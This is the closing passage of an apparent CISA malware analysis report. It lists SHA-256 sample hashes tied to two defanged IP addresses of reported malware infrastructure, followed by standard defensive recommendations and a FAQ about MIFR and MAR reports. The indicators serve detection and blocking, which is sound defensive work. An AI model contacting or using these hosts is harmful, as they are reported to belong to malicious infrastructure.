b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321
107[.]148[.]223[.]196
Connected_From
b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2
107[.]148[.]223[.]196
Connected_From
9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5
107[.]148[.]223[.]196
Connected_From
3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7
107[.]148[.]223[.]196
Connected_From
80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043
107[.]148[.]223[.]196
Connected_From
f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa
107[.]148[.]223[.]196
Connected_From
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0
107[.]148[.]223[.]196
Connected_From
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
2b2b7c5e82...
Connected_To
107[.]148[.]219[.]54
107[.]148[.]219[.]54
Connected_From
2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7
Recommendations
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
Monitor users' web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".
Contact Information
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/
Document FAQ
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk .
Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov .
Acknowledgments
Mandiant contributed to this report.